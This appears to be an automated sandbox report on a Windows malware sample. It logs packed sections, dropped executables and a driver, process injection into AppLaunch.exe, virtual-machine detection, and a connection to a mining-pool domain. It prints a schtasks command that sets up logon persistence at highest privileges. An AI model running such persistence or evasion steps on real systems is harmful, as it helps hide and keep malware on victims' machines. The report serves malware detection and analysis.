                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F7E69 push eax; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8110 push edx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8091 push ecx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F82F1 push edx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3571 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8570 push ebx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3541 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3590 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F97D8 push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623B00 push rax; retf
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623BFF push rax; iretd
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_006238C0 push rax; retn 0009h
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623AB7 push rax; retf 0009h
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00409B00 push rax; retf
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name: .loHdXUK
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name: .adata
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name: .2w140TT
                  Source: sistem.exe.1.drStatic PE information: section name: .adata
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: real checksum: 0x378b16 should be: 0x37c3ee
                  Source: sistem.exe.1.drStatic PE information: real checksum: 0x374485 should be: 0x363658
                  Source: initial sampleStatic PE information: section name: entropy: 7.99714150919
                  Source: initial sampleStatic PE information: section name: entropy: 7.89828462596
                  Source: initial sampleStatic PE information: section name: entropy: 7.99330469272
                  Source: initial sampleStatic PE information: section name: entropy: 7.78378163159
                  Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22431447957
                  Source: initial sampleStatic PE information: section name: .loHdXUK entropy: 7.91937517669
                  Source: initial sampleStatic PE information: section name: entropy: 7.99376649228
                  Source: initial sampleStatic PE information: section name: entropy: 7.99416148233
                  Source: initial sampleStatic PE information: section name: entropy: 7.79638828934
                  Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.95896631222
                  Source: initial sampleStatic PE information: section name: .2w140TT entropy: 7.91810923308

                  Persistence and Installation Behavior:

                  barindex
                  Sample is not signed and drops a device driverShow sources
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\sistem.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Uses known network protocols on non-standard portsShow sources
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Query firmware table information (likely to detect VMs)Show sources
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1836Thread sleep time: -16602069666338586s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 3398
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 5671
                  Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
                  Source: conhost.exe, 00000011.00000003.755448964.00000201F483F000.00000004.00000001.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
                  Source: AppLaunch.exe, 00000001.00000002.739738609.000000000A288000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                  Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_2_004074B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\explorer.exeDomain query: mine.bmpool.org
                  Source: C:\Windows\explorer.exeNetwork Connect: 157.90.156.89 116
                  Allocates memory in foreign processesShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
